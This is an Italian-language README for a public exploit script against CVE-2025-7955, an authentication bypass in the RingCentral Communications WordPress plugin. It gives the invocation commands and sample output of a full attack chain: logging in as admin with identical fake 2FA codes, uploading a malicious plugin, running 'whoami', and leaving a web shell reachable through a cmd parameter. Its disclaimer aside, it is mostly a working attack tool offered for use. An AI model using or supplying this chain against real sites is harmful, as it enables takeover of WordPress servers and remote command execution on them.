
RingCentral Communications 1.5 - 1.6.8 - Mancata verifica lato server per il bypass dell'autenticazione tramite la funzione ringcentral_admin_login_2fa_verify
RingCentral Communications 1.5 - 1.6.8 - Mancata verifica lato server che consente il bypass dell'autenticazione tramite la funzione ringcentral_admin_login_2fa_verify
CVE: CVE-2025-7955
Plugin interessato: RingCentral Communications (WordPress)
Versioni interessate: 1.5 – 1.6.8
Punteggio CVSS: 9.8 (Critico)
Tipo: Bypass dell'autenticazione (mancata verifica lato server)
Il plugin RingCentral Communications per WordPress è vulnerabile a un bypass dell'autenticazione a causa di una validazione impropria nella funzione
ringcentral_admin_login_2fa_verify(). Le versioni da 1.5 a 1.6.8 consentono a un attaccante non autenticato di accedere come qualsiasi utente semplicemente fornendo codici identici falsi.
Questo exploit automatizza l'intera catena di attacco per CVE-2025-7955. È progettato per:
/wp-json/wp/v2/users/ID).whoami tramite la shell e stampa l'output.Prepara il tuo plugin malevolo
Assicurati di avere il file ZIP del tuo plugin malevolo (predefinito: Nxploit.zip) nella stessa directory dello script.
Esegui l'exploit:
python3 CVE-2025-7955.py -u http://target/wordpress [-user admin] [-id 1] [-z Nxploit.zip]
-u, --url : (obbligatorio) URL del sito WordPress target-user, --username : (opzionale) Nome utente con cui accedere (rilevato automaticamente se omesso)-id, --id_admin : (predefinito: 1) ID utente (admin di solito è ID 1)-z, --zip : (predefinito: Nxploit.zip) Percorso del file ZIP del plugin malevoloEsempio:
python3 CVE-2025-7955.py -u http://target/wordpress
oppure specifica nome utente/ID:
python3 CVE-2025-7955.py -u http://target/wordpress -user admin -id 1
888b 888 888 d8b 888 888
8888b 888 888 Y8P 888 888
88888b 888 888 888 888
888Y88b 888 888 888 88888b. 888 .d88b. 888 888888 .d88b. .d88888
888 Y88b888 `Y8bd8P' 888 "88b 888 d88""88b 888 888 d8P Y8b d88" 888
888 Y88888 X88K 888 888 888 888 888 888 888 88888888 888 888
888 Y8888 .d8""8b. 888 d88P 888 Y88..88P 888 Y88b. Y8b. Y88b 888
888 Y888 888 888 88888P" 888 "Y88P" 888 "Y888 "Y8888 "Y88888
888
888
888
CVE-2025-7955 Exploit By : Nxploited
[*] Using User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
[*] Attempting login as: admin (ID: 1)
[+] Login successful!
[+] Nonce: 661e57f2e4
[*] Uploading malicious plugin...
[+] Plugin uploaded successfully!
[*] Executing: whoami
----------------------------------------
daemon
----------------------------------------
[+] Shell: http://target/wordpress/wp-content/plugins/Nxploit/index.php?cmd=COMMAND
Questo strumento è solo per test di sicurezza autorizzati e scopi educativi.
L'uso non autorizzato contro sistemi di cui non si è proprietari o per i quali non si ha un permesso esplicito di test è illegale e non etico.
L'autore non si assume alcuna responsabilità per qualsiasi uso improprio o danno causato da questo script.
Autore: Khaled Alenazi (Nxploited)